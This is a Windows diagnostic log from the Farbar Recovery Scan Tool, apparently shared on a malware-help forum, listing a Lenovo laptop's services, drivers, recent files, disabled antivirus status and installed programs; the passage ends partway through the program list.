S4 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [6942480 2016-03-02] (TeamViewer GmbH)
S3 TieringEngineService; C:\Windows\system32\TieringEngineService.exe [287744 2016-07-16] (Microsoft Corporation)
R3 TimeBrokerSvc; C:\Windows\System32\TimeBrokerServer.dll [177664 2016-07-16] (Microsoft Corporation)
S4 tzautoupdate; C:\Windows\system32\tzautoupdate.dll [95232 2016-09-24] (Microsoft Corporation)
R3 UnistoreSvc_571b2; C:\WINDOWS\System32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R3 UnistoreSvc_571b2; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R3 UserDataSvc_571b2; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
R3 UserDataSvc_571b2; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
S3 vmicrdv; C:\Windows\System32\icsvcext.dll [349696 2016-09-15] (Microsoft Corporation)
S3 vmicvss; C:\Windows\System32\icsvcext.dll [349696 2016-09-15] (Microsoft Corporation)
S4 VPNUnlimitedService; C:\Program Files (x86)\VPN Unlimited\vpn-unlimited-daemon.exe [61808 2015-09-23] (KeepSolid Inc.)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [347328 2016-07-16] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [103720 2016-07-16] (Microsoft Corporation)
S3 wisvc; C:\Windows\system32\flightsettings.dll [635904 2016-11-02] (Microsoft Corporation)
S3 WpnUserService; C:\Windows\System32\WpnUserService.dll [74240 2016-07-16] (Microsoft Corporation)
S3 WpnUserService_571b2; C:\WINDOWS\system32\svchost.exe [44496 2016-07-16] (Microsoft Corporation)
S3 WpnUserService_571b2; C:\WINDOWS\SysWOW64\svchost.exe [38792 2016-07-16] (Microsoft Corporation)
R2 ymc; C:\ProgramData\LenovoTransition\Server\x64\ymc.exe [32016 2013-10-26] (Lenovo)
R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X]

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AcpiDev; C:\Windows\System32\drivers\AcpiDev.sys [18432 2016-07-16] (Microsoft Corporation)
S3 applockerfltr; C:\Windows\System32\drivers\applockerfltr.sys [15360 2016-07-16] (Microsoft Corporation)
S0 b06bdrv; C:\Windows\System32\drivers\bxvbda.sys [533856 2016-07-16] (QLogic Corporation)
S3 bcmfn; C:\Windows\System32\drivers\bcmfn.sys [9728 2016-07-16] (Windows (R) Win 7 DDK provider)
S2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [154680 2016-01-07] (BlueStack Systems)
R3 BthA2DP; C:\Windows\system32\drivers\BthA2DP.sys [168448 2016-09-15] (Microsoft Corporation)
R3 BthHFAud; C:\Windows\System32\drivers\BthHfAud.sys [37376 2016-07-16] (Microsoft Corporation)
R3 BthLEEnum; C:\Windows\System32\drivers\BthLEEnum.sys [249856 2016-09-15] (Microsoft Corporation)
S3 cht4iscsi; C:\Windows\System32\drivers\cht4sx64.sys [346976 2016-07-16] (Chelsio Communications)
S3 cht4vbd; C:\Windows\System32\drivers\cht4vx64.sys [2104160 2016-07-16] (Chelsio Communications)
R2 clreg; C:\Windows\System32\drivers\registry.sys [70144 2016-07-16] (Microsoft Corporation)
R3 DptfDevPch; C:\Windows\system32\DRIVERS\DptfDevPch.sys [114680 2013-08-02] (Intel Corporation)
R3 DptfDevProc; C:\Windows\system32\DRIVERS\DptfDevProc.sys [287160 2013-08-02] (Intel Corporation)
R3 DptfManager; C:\Windows\system32\DRIVERS\DptfManager.sys [494272 2013-08-02] (Intel Corporation)
S3 hvservice; C:\Windows\System32\drivers\hvservice.sys [73568 2016-09-24] (Microsoft Corporation)
S3 iagpio; C:\Windows\System32\drivers\iagpio.sys [33280 2016-07-16] (Intel(R) Corporation)
S3 iai2c; C:\Windows\System32\drivers\iai2c.sys [81408 2016-07-16] (Intel(R) Corporation)
S3 iaLPSS2i_GPIO2; C:\Windows\System32\drivers\iaLPSS2i_GPIO2.sys [64512 2016-07-16] (Intel Corporation)
S3 iaLPSS2i_I2C; C:\Windows\System32\drivers\iaLPSS2i_I2C.sys [176384 2016-07-16] (Intel Corporation)
R3 ibtusb; C:\Windows\system32\DRIVERS\ibtusb.sys [231168 2017-01-13] (Intel Corporation)
R3 ikbevent; C:\Windows\system32\DRIVERS\ikbevent.sys [21408 2013-08-01] ()
R3 imsevent; C:\Windows\system32\DRIVERS\imsevent.sys [21920 2013-08-01] ()
S3 IndirectKmd; C:\Windows\System32\drivers\IndirectKmd.sys [35840 2016-07-16] (Microsoft Corporation)
R0 iorate; C:\Windows\System32\drivers\iorate.sys [48992 2016-11-02] (Microsoft Corporation)
R3 ISCT; C:\Windows\System32\drivers\ISCTD64.sys [46568 2013-08-01] ()
S0 megasas2i; C:\Windows\System32\drivers\MegaSas2i.sys [64352 2016-10-05] (Avago Technologies)
R3 MEIx64; C:\Windows\system32\DRIVERS\TeeDriverx64.sys [99288 2013-12-20] (Intel Corporation)
S3 NetAdapterCx; C:\Windows\System32\drivers\NetAdapterCx.sys [90624 2016-07-16] ()
R3 NETwNb64; C:\Windows\System32\drivers\Netwbw02.sys [3485696 2016-07-16] (Intel Corporation)
S0 percsas2i; C:\Windows\System32\drivers\percsas2i.sys [58720 2016-07-16] (Avago Technologies)
R3 rtsuvc; C:\Windows\system32\DRIVERS\rtsuvc.sys [8247640 2013-07-19] (Realtek Semiconductor Corp.)
S0 scmbus; C:\Windows\System32\drivers\scmbus.sys [88416 2016-07-16] (Microsoft Corporation)
S3 scmdisk0101; C:\Windows\System32\drivers\scmdisk0101.sys [123904 2016-07-16] (Microsoft Corporation)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [42696 2015-06-03] (Synaptics Incorporated)
S3 UcmTcpciCx0101; C:\Windows\System32\Drivers\UcmTcpciCx.sys [108544 2016-07-16] (Microsoft Corporation)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [45568 2016-07-16] (Microsoft Corporation)
S3 vmgid; C:\Windows\System32\drivers\vmgid.sys [10240 2016-07-16] (Microsoft Corporation)
R0 volume; C:\Windows\System32\drivers\volume.sys [16224 2016-07-16] (Microsoft Corporation)
R2 wcifs; C:\Windows\system32\drivers\wcifs.sys [119648 2016-09-15] (Microsoft Corporation)
R2 wcnfs; C:\Windows\system32\drivers\wcnfs.sys [66560 2016-07-16] (Microsoft Corporation)
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44056 2016-07-16] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [290144 2016-07-16] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [123232 2016-07-16] (Microsoft Corporation)
S3 wsvd; C:\Windows\system32\DRIVERS\wsvd.sys [102376 2012-06-13] ("CyberLink)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

NETSVC: shpamsvc -> C:\Windows\system32\Windows.SharedPC.AccountManager.dll (Microsoft Corporation)
NETSVC: WpnService -> C:\Windows\system32\WpnService.dll (Microsoft Corporation)
NETSVC: wisvc -> C:\Windows\system32\flightsettings.dll (Microsoft Corporation)

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-03-03 21:12 - 2017-03-03 21:12 - 00000797 _____ C:\Users\007\Desktop\JRT.txt
2017-03-03 20:23 - 2017-03-03 20:23 - 00000000 __RHD C:\MSOCache
2017-03-03 20:06 - 2017-03-03 20:06 - 00006462 _____ C:\Users\007\Desktop\malwarebytes 3.3.17 report.txt
2017-03-03 20:01 - 2017-03-03 20:57 - 00186304 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMChameleon.sys
2017-03-03 20:01 - 2017-03-03 20:57 - 00111544 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\farflt.sys
2017-03-03 20:01 - 2017-03-03 20:57 - 00092088 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mwac.sys
2017-03-03 20:01 - 2017-03-03 20:01 - 00001883 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-03-03 20:01 - 2017-03-03 20:01 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-03-03 20:01 - 2017-03-03 20:01 - 00000000 ____D C:\Program Files\Malwarebytes
2017-03-03 20:01 - 2017-02-24 06:23 - 00077408 _____ C:\WINDOWS\system32\Drivers\mbae64.sys
2017-03-03 19:28 - 2017-03-03 21:09 - 01663736 _____ (Malwarebytes) C:\Users\007\Desktop\JRT.exe
2017-03-03 19:28 - 2017-03-03 19:28 - 01663736 _____ (Malwarebytes) C:\Users\007\Downloads\JRT.exe
2017-03-03 19:27 - 2017-03-03 20:28 - 04031440 _____ C:\Users\007\Desktop\AdwCleaner.exe
2017-03-03 19:26 - 2017-03-03 20:00 - 57131432 _____ (Malwarebytes ) C:\Users\007\Desktop\mb3-setup-consumer-3.0.6.1469-1075.exe
2017-03-03 19:24 - 2017-03-03 19:24 - 00205169 _____ C:\Users\007\Desktop\I believe I have malware on my computer. - TechSpot Forums.html
2017-03-03 19:24 - 2017-03-03 19:24 - 00000000 ____D C:\Users\007\Desktop\I believe I have malware on my computer. - TechSpot Forums_files
2017-03-03 19:18 - 2017-03-03 19:18 - 00026506 _____ C:\Users\007\Desktop\a.txt
2017-03-03 19:17 - 2017-03-03 19:17 - 00026508 _____ C:\Users\007\Desktop\rk_325A.tmp.txt
2017-03-03 19:16 - 2017-03-03 19:16 - 00003968 _____ C:\WINDOWS\System32\Tasks\{6CD4C77C-DB7F-70D7-5EBC-8B31C233D9EF}
2017-03-03 18:50 - 2017-03-03 18:50 - 00028272 _____ C:\WINDOWS\system32\Drivers\TrueSight.sys
2017-03-03 18:50 - 2017-03-03 18:50 - 00000870 _____ C:\Users\Public\Desktop\RogueKiller.lnk
2017-03-03 18:49 - 2017-03-03 19:19 - 00000000 ____D C:\ProgramData\RogueKiller
2017-03-03 18:49 - 2017-03-03 18:50 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RogueKiller
2017-03-03 18:49 - 2017-03-03 18:50 - 00000000 ____D C:\Program Files\RogueKiller
2017-03-03 18:47 - 2017-03-03 18:48 - 34885984 _____ (Adlice Software ) C:\Users\007\Desktop\setup.exe
2017-03-03 16:49 - 2017-03-03 16:49 - 00000000 ____D C:\WINDOWS\Panther
2017-03-02 21:29 - 2017-03-02 21:29 - 00000000 ____D C:\WINDOWS\LastGood.Tmp
2017-03-01 14:20 - 2017-03-01 14:20 - 00000336 _____ C:\Users\007\Desktop\SHIVANG.txt
2017-03-01 14:18 - 2017-03-01 14:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\KeyFinder
2017-03-01 14:18 - 2017-03-01 14:18 - 00000000 ____D C:\Program Files (x86)\Magical Jelly Bean
2017-03-01 14:16 - 2017-03-01 14:16 - 00321324 _____ C:\WINDOWS\Minidump\030117-8218-01.dmp
2017-02-27 14:59 - 2017-03-03 20:07 - 00008976 _____ C:\WINDOWS\PFRO.log
2017-02-26 08:58 - 2017-02-26 08:58 - 00086646 _____ C:\Users\007\Downloads\Formula1.2016.Round21.Abu_Dhabi.Race.Build-Up.SkySportsF1.720p.H265.English.torrent
2017-02-26 07:23 - 2017-02-26 07:23 - 08176017 _____ C:\Users\007\Downloads\InfectionControl2015.zip
2017-02-26 07:23 - 2017-02-26 07:23 - 02352528 _____ C:\Users\007\Downloads\Rotator-and-Student-Orientation.zip
2017-02-24 06:11 - 2017-02-24 06:11 - 01072128 _____ C:\Users\007\Downloads\checklist-2-armed-rct_default.ppt
2017-02-21 20:15 - 2017-02-26 07:26 - 00000000 ____D C:\Users\007\Desktop\HAV lecture
2017-02-19 21:58 - 2017-02-19 22:12 - 00000000 ____D C:\Users\007\Desktop\AIMCC
2017-02-07 22:53 - 2017-02-07 22:53 - 00000000 ____D C:\Users\007\Desktop\radio
2017-02-07 22:53 - 2017-02-07 22:53 - 00000000 ____D C:\Users\007\Desktop\radio
2017-02-02 20:08 - 2017-03-02 21:29 - 00003452 _____ C:\WINDOWS\setupact.log
2017-02-02 20:08 - 2017-03-02 21:29 - 00000464 _____ C:\WINDOWS\setuperr.log

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-03-03 21:55 - 2017-01-22 19:44 - 00035098 _____ C:\Users\007\Desktop\FRST.txt
2017-03-03 21:55 - 2017-01-22 19:44 - 00000000 ____D C:\FRST
2017-03-03 21:45 - 2017-01-27 19:11 - 00000275 _____ C:\WINDOWS\WindowsUpdate.log
2017-03-03 21:32 - 2016-09-23 22:02 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-03-03 21:32 - 2016-07-16 05:47 - 00000000 ____D C:\WINDOWS\system32\sru
2017-03-03 21:01 - 2016-07-29 22:30 - 04711534 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2017-03-03 21:00 - 2017-01-23 19:29 - 00000000 ____D C:\AdwCleaner
2017-03-03 20:57 - 2016-09-23 22:16 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2017-03-03 20:57 - 2016-09-23 22:03 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-03-03 20:57 - 2016-08-07 10:18 - 00251840 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-03-03 20:57 - 2016-08-07 10:18 - 00043968 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbam.sys
2017-03-03 20:57 - 2016-02-06 00:11 - 00000000 ____D C:\Temp
2017-03-03 20:56 - 2016-07-16 00:04 - 01048576 _____ C:\WINDOWS\system32\config\BBI
2017-03-03 20:35 - 2016-07-16 05:47 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-03-03 20:16 - 2016-12-12 13:37 - 00003270 _____ C:\WINDOWS\System32\Tasks\OneDrive Standalone Update Task v2
2017-03-03 20:08 - 2016-09-23 22:06 - 00000000 ____D C:\Users\007
2017-03-03 20:08 - 2016-01-03 18:52 - 00000258 __RSH C:\ProgramData\ntuser.pol
2017-03-03 20:05 - 2015-11-08 02:11 - 00000000 ____D C:\Users\007\AppData\Roaming\vlc
2017-03-03 20:01 - 2016-08-07 10:18 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-03-03 19:16 - 2016-09-23 22:16 - 00003878 _____ C:\WINDOWS\System32\Tasks\{1C4B8B9E-DE5F-6DE8-65E2-49D96144215A}
2017-03-03 19:11 - 2013-08-22 09:36 - 00000000 ___HD C:\WINDOWS\system32\GroupPolicy
2017-03-03 18:30 - 2016-11-28 15:49 - 00004148 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{88938F53-F35B-46C3-83EF-574C9ECB74F2}
2017-03-03 16:53 - 2017-01-22 19:44 - 00054732 _____ C:\Users\007\Desktop\Addition.txt
2017-03-01 14:36 - 2015-11-07 23:14 - 00000000 ____D C:\Program Files\Microsoft Office 15
2017-03-01 14:16 - 2016-10-07 07:11 - 00000000 ____D C:\WINDOWS\Minidump
2017-02-27 19:16 - 2017-01-23 19:21 - 00000000 ____D C:\ProgramData\{75B3123D-C218-A596-FE55-6B3AE26A02BB}
2017-02-27 19:16 - 2017-01-23 19:16 - 00000000 ____D C:\ProgramData\{33B94F1E-8412-F8B5-202E-AD1CD3E2D668}
2017-02-27 14:58 - 2016-02-01 10:34 - 00000000 ____D C:\Users\007\AppData\Roaming\Rsupport
2017-02-27 14:56 - 2017-01-29 10:15 - 00000000 ____D C:\Program Files (x86)\NirSoft
2017-02-27 14:54 - 2016-07-16 05:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed
2017-02-27 14:54 - 2016-07-16 05:47 - 00000000 ____D C:\WINDOWS\system32\Macromed
2017-02-26 09:08 - 2015-11-07 19:56 - 00000000 ____D C:\Users\007\AppData\Local\Packages
2017-02-23 18:20 - 2015-12-14 00:21 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2017-02-23 00:27 - 2015-11-08 00:08 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-02-23 00:23 - 2015-11-08 00:08 - 138020592 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-02-22 23:59 - 2016-07-29 22:50 - 00002372 _____ C:\Users\007\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-02-22 23:59 - 2016-07-29 22:50 - 00000000 ___RD C:\Users\007\OneDrive
2017-02-21 18:48 - 2016-07-16 05:36 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-02-19 15:09 - 2016-01-02 19:22 - 00000830 _____ C:\WINDOWS\Tasks\Adobe Flash Player Updater.job
2017-02-06 13:48 - 2016-07-16 05:49 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-02-06 13:48 - 2016-07-16 05:49 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2017-02-02 19:58 - 2017-01-22 19:55 - 00002283 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-02-02 19:58 - 2017-01-22 19:55 - 00002271 _____ C:\Users\Public\Desktop\Google Chrome.lnk

==================== Files in the root of some directories =======

2015-11-07 22:31 - 2015-11-07 22:31 - 20320792 _____ (LastPass) C:\Program Files (x86)\Common Files\lpuninstall.exe
2015-11-07 19:57 - 2015-11-10 22:55 - 0012093 _____ () C:\Users\007\AppData\Roaming\AbsoluteReminder.xml
2016-01-03 21:17 - 2016-05-31 19:22 - 0000600 _____ () C:\Users\007\AppData\Local\PUTTY.RND
2016-09-23 22:04 - 2016-09-23 22:04 - 0000000 ____H () C:\ProgramData\DP45977C.lfl

Some files in TEMP:
====================
C:\Users\007\AppData\Local\Temp\dllnt_dump.dll
C:\Users\007\AppData\Local\Temp\iv_uninstall.exe


==================== Bamital & volsnap =================

(There is no automatic fix for files that do not pass verification.)

C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed


LastRegBack: 2017-02-21 22:59

==================== End of FRST.txt ============================

 

[shivmister]

Additional scan result of Farbar Recovery Scan Tool (x64) Version:04-10-2015
Ran by 007 (2017-03-03 21:56:18)
Running from C:\Users\007\Desktop
Windows 10 Home (X64) (2016-09-24 04:17:52)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

007 (S-1-5-21-3283718265-1983809055-1317204610-1001 - Administrator - Enabled) => C:\Users\007
Administrator (S-1-5-21-3283718265-1983809055-1317204610-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3283718265-1983809055-1317204610-503 - Limited - Disabled)
Guest (S-1-5-21-3283718265-1983809055-1317204610-501 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Malwarebytes (Disabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Disabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Absolute Reminder (HKLM-x32\...\{40F4FF7A-B214-4453-B973-080B09CED019}) (Version: 2.3.0.1 - Absolute Software)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 15.023.20070 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 24.0.0.180 - Adobe Systems Incorporated)
AirDroid 3.2.2.0 (HKLM-x32\...\AirDroid) (Version: 3.2.2.0 - Sand Studio)
Apple Application Support (32-bit) (HKLM-x32\...\{F2871C89-C8A5-42EE-8D45-0F02506385A6}) (Version: 5.1 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{9BC93467-75D1-4AA4-BD58-D9C51D88DFAB}) (Version: 5.1 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{55BB2110-FB43-49B3-93F4-945A0CFB0A6C}) (Version: 10.0.1.3 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{56EC47AA-5813-4FF6-8E75-544026FBEA83}) (Version: 2.2.0.150 - Apple Inc.)
BlackChipPoker (HKLM-x32\...\FE4D6F94-B3D5-484b-94F7-8BC45DEB7A82) (Version: 16.6 - IGSoft)
BlueStacks App Player (HKLM-x32\...\{4047E0FE-CBD8-4915-BBB1-45F6CBF417AC}) (Version: 2.0.4.5627 - BlueStack Systems, Inc.)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.26 - Piriform)
Classic Shell (HKLM\...\{D4B3454F-7529-4F5F-851D-2C36933F7D64}) (Version: 4.2.5 - IvoSoft)
CuteFTP 8 Professional (HKLM-x32\...\{91F34319-08DE-457a-99C0-0BCDFAC145B9}) (Version: 8.3.4 - GlobalSCAPE)
CyberLink PowerDirector 10 (HKLM-x32\...\InstallShield_{B0B4F6D2-F2AE-451A-9496-6F2F6A897B32}) (Version: 10.0.0.2810 - CyberLink Corp.)
CyberLink PowerDirector 10 (Version: 10.0.0.2810 - CyberLink Corp.) Hidden
Dolby Digital Plus Home Theater (HKLM\...\{7E3D8FA1-6092-469A-955B-68FC4A2C67CA}) (Version: 7.3.2.2 - Dolby Laboratories Inc)
Dragon Assistant Application en-US version 1.5.8 (HKLM-x32\...\{1CCBE73F-4948-4711-8D12-22E2FD65D706}_is1) (Version: 1.5.8 - Nuance Communications, Inc.)
Dragon Assistant Core Recognition Service version 1.1.10 (HKLM-x32\...\{E97BA7A6-46FC-4EBF-B24A-B8362948C696}_is1) (Version: 1.1.10 - Nuance Communications, Inc.)
Dragon Assistant Installer version 1.5.8 (HKLM-x32\...\{D57A8269-3BE5-4D10-B882-64D0F2D448BF}_is1) (Version: 1.5.8 - Nuance Communications, Inc.)
Dragon Assistant Language Data en-US version 1.1.3 (HKLM-x32\...\{4C0C1E4E-D3B1-4496-98EC-DA14D45EC855}_is1) (Version: 1.1.3 - Nuance Communications, Inc.)
DVD Decrypter (Remove Only) (HKLM-x32\...\DVD Decrypter) (Version: - )
DVD Shrink 3.2 (HKLM-x32\...\DVD Shrink_is1) (Version: - DVD Shrink)
Easy2Convert PIC to JPG 2.2.1 (HKLM-x32\...\{958D3CE0-3C49-40F1-B2EF-14D8FAED7303}_is1) (Version: 2.2.1 - Easy2Convert Software)
Energy Manager (HKLM-x32\...\InstallShield_{AC768037-7079-4658-AC24-2897650E0ABE}) (Version: 1.0.1.38 - Lenovo)
Energy Manager (x32 Version: 1.0.1.38 - Lenovo) Hidden
FileZilla Client 3.14.1 (HKLM-x32\...\FileZilla Client) (Version: 3.14.1 - Tim Kosse)
Foxit PhantomPDF Business (HKLM-x32\...\{05594894-9B62-4D66-BC12-4DA14CA22F28}) (Version: 7.3.6.321 - Foxit Software Inc.)
Foxit Reader (HKLM-x32\...\Foxit Reader_is1) (Version: 7.2.8.1124 - Foxit Software Inc.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 56.0.2924.87 - Google Inc.)
Google Update Helper (x32 Version: 1.3.32.7 - Google Inc.) Hidden
HandBrake 0.10.5 (HKLM-x32\...\HandBrake) (Version: 0.10.5 - )
Intel Experience Center - Configuration (x32 Version: 1.7.0.179 - Intel) Hidden
Intel(R) Dynamic Platform and Thermal Framework (HKLM-x32\...\FFD10ECE-F715-4a86-9BD8-F6F47DA5DA1C) (Version: 7.1.0.2103 - Intel Corporation)
Intel(R) Experience Center Desktop Software (HKLM-x32\...\{3608ec0a-56b4-4d9d-b038-9b3e51d72582}) (Version: 1.7.0.179 - Intel)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 9.5.13.1706 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Intel(R) PROSet/Wireless Software for Bluetooth(R) Technology(patch version 3.0.1337.1) (HKLM\...\{302600C1-6BDF-4FD1-1307-148929CC1385}) (Version: 3.1.1307.0362 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 12.8.0.1016 - Intel Corporation)
Intel(R) Smart Connect Technology (HKLM\...\{D6FBF816-ACB8-46CC-ACC6-C8BBA85F497D}) (Version: 4.2.40.2418 - Intel Corporation)
Intel(R) Update Manager (x32 Version: 1.6.2.69 - Intel Corporation) Hidden
Intel® PROSet/Wireless Software (HKLM-x32\...\{e1172fd4-a6d9-4cfa-8256-268f728fec31}) (Version: 16.5.3 - Intel Corporation)
iTunes (HKLM\...\{554C62C7-E6BB-40F1-892B-F0AE02D3C135}) (Version: 12.5.3.17 - Apple Inc.)
Java 8 Update 101 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F32180101F0}) (Version: 8.0.1010.13 - Oracle Corporation)
Java SE Development Kit 8 Update 101 (HKLM-x32\...\{32A3A4F4-B792-11D6-A78A-00B0D0180101}) (Version: 8.0.1010.13 - Oracle Corporation)
LastPass (uninstall only) (HKLM-x32\...\LastPass) (Version: - LastPass)
Lenovo App Shop (HKLM-x32\...\Lenovo App Shop 45246) (Version: 3.10.0.45246.24 - Lenovo)
Lenovo EasyCamera (HKLM-x32\...\{E0A7ED39-8CD6-4351-93C3-69CCA00D12B4}) (Version: 6.2.9200.10240 - Realtek Semiconductor Corp.)
Lenovo Motion Control (HKLM-x32\...\InstallShield_{A800D2BF-2F0D-4899-B265-C91C90981E8C}) (Version: 2.0.0.0829 - PointGrab)
Lenovo Motion Control (x32 Version: 2.0.0.0829 - PointGrab) Hidden
Lenovo OneKey Recovery (HKLM-x32\...\InstallShield_{46F4D124-20E5-4D12-BE52-EC177A7A4B42}) (Version: 8.0.0.2105 - CyberLink Corp.)
Lenovo OneKey Recovery (Version: 8.0.0.2105 - CyberLink Corp.) Hidden
Lenovo Smart Voice (HKLM\...\Lenovo SmartVoice) (Version: 1.0.2.0 - Lenovo)
Lenovo Transition (HKLM\...\Lenovo Transition) (Version: 2.0.13.8211 - Lenovo)
Lenovo Yoga PhoneCompanion (HKLM-x32\...\InstallShield_{0F82EA83-B0C5-4AB9-9695-DFE92C5FD57B}) (Version: 1.1.9.3 - Lenovo)
Lenovo Yoga PhoneCompanion (x32 Version: 1.1.9.3 - Lenovo) Hidden
Magic ISO Maker v5.5 (build 0281) (HKLM-x32\...\Magic ISO Maker v5.5 (build 0281)) (Version: - )
Magical Jelly Bean KeyFinder (HKLM-x32\...\KeyFinder_is1) (Version: 2.0.10.12 - Magical Jelly Bean)
Malwarebytes version 3.0.6.1469 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.0.6.1469 - Malwarebytes)
Microsoft Office Professional Plus 2013 - en-us (HKLM\...\ProPlusRetail - en-us) (Version: 15.0.4903.1002 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3283718265-1983809055-1317204610-1001\...\OneDriveSetup.exe) (Version: 17.3.6798.0207 - Microsoft Corporation)
Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.50901.0 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
